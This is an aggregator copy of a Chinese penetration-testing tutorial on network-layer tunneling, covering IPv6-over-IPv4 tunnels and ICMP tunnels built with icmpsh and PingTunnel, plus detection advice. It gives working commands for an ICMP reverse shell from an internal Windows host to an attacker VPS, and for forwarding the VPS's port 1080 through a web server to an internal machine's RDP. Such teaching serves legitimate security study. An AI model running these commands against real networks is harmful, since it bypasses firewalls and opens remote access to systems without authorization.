3

网络层隧道技术

 1 year ago
source link: https://joker-vip.github.io/2022/05/04/3.2%20%E7%BD%91%E7%BB%9C%E5%B1%82%E9%9A%A7%E9%81%93%E6%8A%80%E6%9C%AF/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

网络层隧道技术

1 IPv6隧道

1.1 技术简介

IPv6隧道技术指的是通过IPv4隧道传送IPv6数据报文的技术,为了在IPv4的海洋中传输IPv6信息,可以将IPv4作为隧道载体,将IPv6报文整体封装在IPv4数据报文中,使IPv6能够穿越IPv4的海洋,到达另一个IPv6小岛。

ipv6隧道技术是指通过ipv4隧道传送ipv6数据报文的技术。攻击者有时会通过恶意软件来配置允许运行ipv6通信的设备,以避开防火墙和入侵检测系统。有一点需要指出:即使设备支持ipv6,也可能无法正确地分析封装了ipv6报文的ipv4数据包。

支持IPv6的隧道工具有socat、6tunnel、nt6tunnel等。

1.2 防御ipv6 隧道攻击的方法

针对ipv6隧道攻击,最好的防御方法是:了解ipv6的具体漏洞,结合其他协议,通过防火墙和深度防御系统过滤ipv6通信,提高主机和应用程序的安全性。

2 ICMP隧道

2.1 icmpsh

工具 icmpsh,从机(客户端)只能在 Windows 上运行,而主机(服务器)可以在攻击者机器上的任何平台上运行。

下载地址:https://github.com/inquisb/icmpsh.git

安装python-impacket类库:

apt-get install python-impacket

关闭系统的ICMP应答(也就是禁ping):

sysctl -w net.ipv4.icmp_echo_ignore_all=1

VPS执行:

./icmpsh_m.py <外网VPS> <内网出口IP>

内网服务器执行:

icmpsh.exe -t <外网VPS>

2.2 pingtunnel

PingTunnel也是一款常用的ICMP隧道工具,可以跨平台使用。为了避免隧道被滥用,可以为隧道设置密码。

下载地址:http://freshmeat.sourceforge.net/projects/ptunnel/

首先要安装工具

wget http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gz
tar -xzvf PingTunnel-0.72.tar.gz
cd PingTunnel
make && make install

如果报pcap.h缺失:

wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz 
tar zxvf libpcap-1.9.0.tar.gz
cd libpcap-1.9.0
./configure

安装中出现yacc包错误

sudo apt-get install -y byacc

最后一步过程中又会报Neither flex nor lex was found的错误:

apt-get install flex bison
./configure
make
sudo make install

回到pingtunnel目录重新执行

make && make install

在web服务器运行命令

ptunnel -x pass

-× 指定icmp隧道连接验证密码
-lp 指定要监听的本地tcp端口
-da 指定要转发到的机器的ip地址
-dp 指定要转发到的机器的tcp端口
-p 指定icmp隧道另一端机器的ip地址

在vps(攻击机)上运行ptunnel

ptunnel -p <web服务器外网ip> -lp 1080 -da <域中内网服务器ip> -dp 3389 -x pass

接下来访问vps(攻击机)的1080端口便可以连接到数据库服务器的远程桌面了(3389)

<vps的ip>:1080

PingTunnel工具在Windows环境中也可以使用,只不过需要在内网的Windows机器上安装wincap类库。

2.3 防御icmcp隧道攻击的方法

  1. 检测同一来源的icmp数据包的数量。一个正常的ping命令每秒最多发送两个数据包,而使用icmp隧道的浏览器会在很短的时间内产生上千个icmp数据包。
  2. 注意那些payload大与64bit的icmp数据包。
  3. 寻找响应数据包中的payload与请求数据包中的playload不一致的icmp数据包。
  4. 检查icmp数据包协议,icmptunnel会在所有的icmp playload前面添加“TUNL来标识隧道–这就是特征。

Recommend

  • 170
    • Engadget 中国版 cn.engadget.com 6 years ago
    • Cache

    Elon Musk 给你看看洛杉矶隧道的最新进度

    希望通过挖掘隧道来抒缓洛杉矶交通而成立 The Boring Company,今天就由其老板 Elon Musk 上传了一张他们其中一段管道的实况相片。在里面,我们可以看到相当整齐的设计,分别铺着缆线、镶板表面和轨道。Elon Musk 补充指目前隧道已经有 500 英尺(约 150 米)长,...

  • 112

    新浪科技讯北京时间11月1日上午消息,特斯拉CEO马斯克计划,花1年时间左右在洛杉矶街道下面挖一条17英里(约27公里)长的隧道。马斯克创办一家名叫Boring的公司,它正在洛杉矶挖隧道。按照马斯克的规划,挖完之后会在隧道内安装胶囊,汽车在

  • 5

    DNS隧道技术绕防火墙 Blood_Zero ·...

  • 46
    • netsecurity.51cto.com 5 years ago
    • Cache

    通过RDP隧道绕过网络限制

    随着越来越多的威胁攻击者使用RDP,安全团队正面临着区别合法和恶意RDP的挑战。Fireeye对此进行调查研究,并提出预防和阻止措施。

  • 39

    ​今天用公司环境在测试网络隧道,在写一半文章的时候突然老板来找我了,我真的好苦啊! 自己好苦命,希望明天不要被怼的太惨。 好了,让我们开始今天的内容。 你是否常常遇到这些个麻烦,因为公司安全策略的问题,每次要通过跳板机而不能直接连开发环境,使用上面...

  • 3
    • www.freebuf.com 2 years ago
    • Cache

    内网渗透之隐藏通信隧道技术

    前段时间读了读徐哥的《内网安全攻防》,并复现了部分知识点,写篇文章记录下学习内容。何为隐藏通信隧道技术?当我们成功杀入内网并完成信息收集后,下一步要进行的就是判断内网的连通性(也就是各种各样的流量包能否出的去、进的来),隐藏通...

  • 0
    • joker-vip.github.io 1 year ago
    • Cache

    传输层隧道技术

    传输层隧道技术传输层技术包括tcp隧道、udp隧道和常规端口转发。在渗透测试中,如果内网防火墙阻止了对指定端口的访问,在获得目标机器的权限后,可以使用IPTABles打开指定端口。 1 lcx端口转发下...

  • 2
    • www.codewoody.com 11 months ago
    • Cache

    介绍一种"新"的隧道技术: spiped

    Published Apr 02, 2023 介绍一种"新"的隧道技术: spiped 在之前的文章

  • 3
    • joker-vip.github.io 7 months ago
    • Cache

    应用层隧道传输技术

    应用层隧道传输技术应用层的隧道通信技术主要利用应用软件提供的端口来发送数据。常用的隧道协议有SSH、HTTP/HTTPS和DNS。 1 SSH 协议在内网中,几乎所有的Linux/UNIX服务器和网络设备都支持SSH协...

  • 1

    如何应对利用加密隧道发起的网络攻击? 2024-01-17 12:01:06 安全 报告数据显示,目前85.9%的网络威胁是通过加密通道发起的,包括...

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK